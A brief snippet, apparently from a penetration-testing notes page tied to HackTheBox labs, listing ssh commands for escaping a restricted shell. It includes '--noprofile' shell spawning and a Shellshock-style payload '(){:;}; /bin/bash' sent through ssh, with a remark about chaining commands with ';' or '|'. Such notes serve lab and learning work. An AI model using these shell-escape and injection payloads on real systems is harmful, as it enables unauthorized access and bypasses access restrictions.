githubEdit

In some cases we may need to use ; |

ssh htb-user@10.129.35.67 -t "bash --noprofile"
ssh user@10.0.0.3 -t "bash --noprofile"
ssh user@10.0.0.3 -t "(){:;}; /bin/bash"

Last updated